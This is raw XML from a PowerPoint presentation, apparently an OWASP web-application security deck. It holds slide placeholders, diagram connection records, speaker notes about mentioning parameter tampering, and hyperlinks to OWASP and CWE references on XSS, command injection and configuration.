    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{0A9AA164-87CC-40DE-B1F6-6F46015816A8}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87F101B5-D9C8-4E97-A471-7B15F3A72AED}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{C748F4BA-955C-4501-A037-0FFAA9192ED9}" srcOrd="1" destOrd="0" parTransId="{78EE1EBE-0D6E-4B27-BE70-0B146F5024AB}" sibTransId="{E9024B6C-0A69-4A4F-ADE8-F4DDBB1AC240}"/>
    <dgm:cxn modelId="{1113FF28-D944-4C56-BD06-3BE09E821A65}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" srcOrd="2" destOrd="0" parTransId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" sibTransId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}"/>
    <dgm:cxn modelId="{B2A44DCA-45AF-4251-9FB1-FF40001FE020}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="2" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{274A3301-EEA4-42E9-B036-2016312A2E0C}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{024BBBE2-0706-4354-8AB0-3262009E8862}" srcOrd="2" destOrd="0" parTransId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" sibTransId="{C468EA37-5762-4D06-A4F9-E930ECF24341}"/>
    <dgm:cxn modelId="{D76044D6-75DA-4CD0-BCD8-457179C432E6}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{34EB9A11-484B-4BA4-AE93-681EFDDD55A2}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6010088D-1046-466A-BB02-8A55CE262380}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" srcOrd="3" destOrd="0" parTransId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" sibTransId="{6249606A-E44B-456D-8550-331FDC0465D3}"/>
    <dgm:cxn modelId="{A7714002-91DA-4C2C-B727-002FA71F4081}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{790066AF-0F2F-4BB4-860C-17F3A9C8CD56}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{50CAC0C3-06E3-44A5-86AA-973B9C7D843B}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5A4E15E8-F047-4B03-9A9B-6598F8E86B9E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9B08A4AF-6606-4358-A074-93C5CBB8EAAE}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C2AAFAC4-E3E9-4FC1-8636-6D92E3575A43}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B28C5F6F-2C0E-414D-901D-99E164C37E8F}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{84A2FB84-1626-444C-91BE-C5DC03021B16}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D2FB22C2-A532-4B62-B5AC-0FE634F45888}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{61697C5F-1BF5-454D-9F98-ECC700CC7513}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0265A93E-487A-4AAE-ACDC-EB98596EF7AF}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BCD6F369-00D3-4FD4-A911-E1A0E112FA72}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D657693B-9F84-427E-9508-62B8246FCBF4}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{123EE575-AC52-4F05-8F70-E78D288E37FD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E5FE3973-D8E6-429C-ACAF-C224902FB875}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{639B55A2-96CA-4704-851E-DB45821B72D4}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DE580AD1-1454-424E-B88D-0B218F69664C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4ECEB5EC-BB52-4A78-A72A-AFF98535E743}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{78126B83-DC36-4F00-8475-FE3F080C66D5}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F25A4B73-96A5-466F-8B41-FBDC421F7A0E}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/31/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656740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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21773748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Can we squeeze a mention of ‘parameter tampering’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.</a:t>
            </a:r>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E37659B-607D-4558-B335-8B20F3AFFB68}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11744447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49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17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49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21773748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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23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E76A86-908E-419A-9621-E32D65ED795D}"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E76A86-908E-419A-9621-E32D65ED795D}"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E76A86-908E-419A-9621-E32D65ED795D}"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E76A86-908E-419A-9621-E32D65ED795D}"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dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51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81471FB-E2D5-4866-9BCF-35590BEE291E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>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pt-BR" dirty="0" smtClean="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24D552B2-6ADE-4344-ADB7-CCBB4421EB54}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>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pt-BR" dirty="0" smtClean="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EE500777-138B-4A13-B6B9-A037D8D5F356}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>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Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enter Title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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="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www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Data_Valida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owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASV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owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/"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www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" 